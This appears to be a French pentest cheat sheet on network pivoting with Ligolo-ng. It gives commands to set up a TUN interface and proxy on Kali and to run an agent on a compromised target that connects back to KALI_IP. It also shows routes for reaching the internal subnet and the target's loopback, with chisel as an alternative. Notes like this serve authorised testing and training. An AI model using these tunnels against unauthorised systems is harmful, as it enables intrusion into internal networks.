Pivoting — Ligolo-ng
Tunnels, routes, listeners.
sommaire
Ligolo-ng — tunnel par interface TUN
Différence avec chisel : ligolo crée une interface réseau (tun) et tu ROUTES le réseau de la cible dessus (au lieu d’un simple forward de port). Astuce clé : l’IP 240.0.0.1 représente le LOOPBACK de l’agent (le 127.0.0.1 de la cible).
Mise en place
# Kali (proxy)
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
# Cible (agent)
./agent -connect KALI_IP:11601 -ignore-cert &
Router + atteindre le loopback de la cible
# dans la console proxy : session -> selectionner -> start
# reseau interne :
sudo ip route add SOUS_RESEAU/24 dev ligolo
# loopback de la cible (127.0.0.1) = 240.0.0.1 :
sudo ip route add 240.0.0.1/32 dev ligolo
# -> viser 240.0.0.1:PORT = 127.0.0.1:PORT sur la cible
#la route pointe bien vers ligolo ?
ip route show | grep ligolo
Note : la version Web UI = mêmes concepts (création d’interface + routes + start via des boutons). Alternative : chisel (R:9100:127.0.0.1:9100).